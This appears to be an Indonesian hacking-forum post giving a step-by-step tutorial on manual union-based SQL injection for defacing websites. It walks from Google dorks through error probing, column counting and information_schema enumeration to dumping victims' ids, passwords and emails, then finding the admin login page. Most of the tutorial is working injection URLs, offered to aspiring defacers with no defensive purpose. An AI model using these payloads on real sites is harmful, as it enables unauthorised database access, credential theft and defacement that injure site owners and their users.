IM-Cyber Forum
-== Welcome Spy Reader ==-

[-] LOGGIN or SIGNUP now

[-] Sebelum Di Gebukin masa ,Liat² Sembarangan

Add Admin Facebook For Register VIP mambers

https://www.facebook.com/ArmourpoizoneII

./ Created By Yakuza
IM-Cyber Forum
-== Welcome Spy Reader ==-

[-] LOGGIN or SIGNUP now

[-] Sebelum Di Gebukin masa ,Liat² Sembarangan

Add Admin Facebook For Register VIP mambers

https://www.facebook.com/ArmourpoizoneII

./ Created By Yakuza
IM-Cyber Forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.

IM-Cyber Forum

[+] Hellcome To Indramayu Site [+] - This is not just art but it is a masterpiece
 
IndeksLatest imagesPencarianPendaftaranLogin
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Joinner
Like This
kamu pengunjung ke
Logo Development
Top posting users this week
No user
sekarang jam
Partners
Partners
Partners
Partners
Partners
Partners
Partners
March 2024
MonTueWedThuFriSatSun
    123
45678910
11121314151617
18192021222324
25262728293031
CalendarCalendar

 

 Deface FULL SQL I

Go down 
PengirimMessage
Admin
Admin
Admin
Admin


Jumlah posting : 40
Points : 74
Reputation : 3
Join date : 19.12.11
Age : 27
Lokasi : Kota Mangga Tercinta

Deface FULL SQL I Empty
PostSubyek: Deface FULL SQL I   Deface FULL SQL I I_icon_minitimeTue Dec 20, 2011 4:59 pm

1. tak perlulah rokok cemilan segala macam lgsg jee...eh tp kopi perlulah soalnya kadang boring,,e=ah sambil ngerokok tak apalah makan makan dikit jee (@gw :munafik gw)
buka google dan pake dork : (ini klo yg belom tw ex: inurl:/news.php?id= atau berita.php... bla bla segala macam dan ada di google ketik aja dork )

2. dan setelah ketemu tambahkan karakter ' atau "-" untuk melihat apakah ada pesan error.
ex : www.siapagitu.com/news.php?id=100' atau
www.siapagitu.com/news.php?id=-100


3. cari jumlah table . caranya target linkny kyk gini www.siapagitu.com/blablabla.php?blabla.php?id=23
truz ubah formatnya jadi : www.siapa gitu.com/blabla.php?id=-23 dan masukan rumus longfield einstein
contoh: www.siapagitu.com/berita.php?id=-23+order+by+1-- atau
www.siapagitu.com/berita.php?id=-23+order+by+1/*

ceklah truzz ampe bosan (zzz -_-")
ex : www.siapagitu.com/berita.php?id=-100+order+by+1--
www.siapagitu.com/berita.php?id=-100+order+by+2--
truuzzz...
www.siapagitu.com/berita.php?id=-100+order+by+20an--


sampe datang tukang pos bilang bla bla bla eror coy atau halaman td mengeluarkan pesan error
jika errornya di www.siapagitu.com/blabla.php?id=5 jadi kita tangkap bahwa 5 nomor gagal dan 4 angka sebelumnya adalah nomor togel (di ingat nih nomor)

4. truzz lgkh selanjutnya cari nomor dewa (nomor ini jga perlu di inget) cara mencari nomor ini :
pake rumus baru +union+select+1,2,3,4,-- (kan td nomor togelnya 4 jadi kita berenti di angka 4,klo misal td di angka 8 jadinya yaa tambah donk angka td ...........4,5,6,7,8-- )

lalu tekan enter dan nanti akan keluar nomor dewa. ingat lagi ni nomor.contoh angka dewanya 2

lalu cari versi yg diapakai situ kelinci percobaan td. masukan perintah tsb pada nagka yg keluar tadi
misal: www.siapagitu.com/blabla.php?id=-23+union+select+1,version(),3--
ingat letak version() harus di angka dewa

nanti akan terlihat versinya contoh : 5.0.1.12 klo di bawah versi 5 berarti cari target lain krn kita harus nebak sndiri tablenya kan pusing nebak nebak ndiri.


5. nah sekarang table . cara nyari table dengan rumus baru lagi.

cara nampilin tabel dari korban td yaitu dengan
rumus : table_name -dimasukan pada angka dewa keluar tadi-
rumus : +from+information_schema.tables-- -dimasukan setelah angka terakhir-

www.siapagitu.com/blabla.php?id=-23+union+select+1,table_name,3+from+information_schema.tables--

nanti akan kluar nama table (yg ini macam macam ada yg table character_set,, atau artikel atau produk dan lain lain yang tidak bisa saya sebutkan satu persatu. terima kasih (kyk celeb dpt award aja..wkwkwkwk)

6. sekarang kan nama table dah dapt tuh waktunya kita sadap isi table. apa sich isi table td (contoh : kadang saya nemu di table ada yang isinya id,userid,username,member,mem_pass,email dan ada pula admin dan pass). untuk melihat isi dalam celana dalam si tabel kita pake lagi rumus baru
rumus : group_concat(table_name) -dimasukan pada angka dewa yang keluar tadi-
rumus : +from+information_schema.tables+where+table_schema=database() -dimasukan setelah angka terakhir-

dan nanti format urlnya jadi gini :

www.siapagitu.com/blabla.php?id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

dan selanjutnya convert nama table td di situs banyaklah contoh : Ascii Converter yg ini caranya buat dengan karya sendiri (kan bangga) masukkin huruf table td di sana satu satu misalakan nama table yg di dapat td table member maka masukkin dari m convert b convert dan seterusnya.. eit ini cara satu dan ada lagi yg lebih gampang dengan converter online di situs http://www.dolcevie.com/js/converter.html ingat klo hasil convert nya ada simbol kyk : atau @ dan segala macam hilangkan saja dan ambil huruf dan angkanya jadi misalkan 23:1d:4b:45 jadi ambil angka dan huruf hingga jadi 231d4b45... ini juga di catat hasil convertnya..siip?


selanjutnya carilah column dengan rumus baru lagi..
rumus : group_concat(column_name) -dimasukan pada angka dewa yg keluar tadi-
rumus : +from+information_schema.columns+where+table_name=0xhexa-- -dimasukan setelah angka terakhir

jadi nanti format urlnya :
www.siapagitu.com/blabla.php?id=-100+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x(angka hasil converter td)--

nah setelah tekan enter maka akan keluar hasil columnnya .. isi dari column ada id,pass,user,member bla bla dan banyak lagi...contoh nya jika yang keluar td adlah : id,pass,email maka kita beranjak ke tahap selanjutnya

7. rumus baru lagi untuk tahap berikut :
rumus : concat_ws(0x3a,hasil isi column yg mau dikeluarkan) -dimasukan pada angka yg keluar tadi-
rumus : +from+(nama table berasal) - dimasukan setelah angka terakhir-

jadi format urlnya kyk gini :
www.siapagitu.com/blabla.php?id=-23+union+select+1,2,3,4,concat_ws(0x3a,id,pass,email),6,7,8+from+(nama table berasal)-- nama tabel berasal maksudnya td kan tabel yg kita dapat di awal sebelum dapat column yg kyk character_set,,,atau admin,,,atau,,,tabel member dan segala macam...

setelah tekan enter : TARAAA ANDA MENDAPATKAN ID,PASS,DAN EMAIL DARI KORBAN


8.nah terakhir kita cari halam login dari situs ex : www.siapagitu.com/admin.php atau ................/login.php atau ................/cpnel dan banyak lagi tergantung usaha anda mencari dengan nalar dan pengalaman


maaf sebelumnya jika saya menjelaskan agak berbelit belit karena perut lagi melilit mw pergi ngacrit...SALAM NEWBIE saya bwt sesepuh kalo nanti melihat.. karena saya tidak mw dikira sombong...saya cuma newbie kk.....dan masih perlu belajar lagi... thx kk kk yg sudah baca leave comment please karena jarang ada yg ngoment

Baca y Musti teliti.. gan.. untuk jadi defacer.. harus mempunyai.. KESABARAN lebih

Kalo Gitu.. TKP yok gan Deface FULL SQL I 2692083094
Kembali Ke Atas Go down
https://im-cyber.forumid.net
 
Deface FULL SQL I
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Cara deface web dengan SQLI Helper

Permissions in this forum:Anda tidak dapat menjawab topik
IM-Cyber Forum :: Area CyberMan-
Navigasi: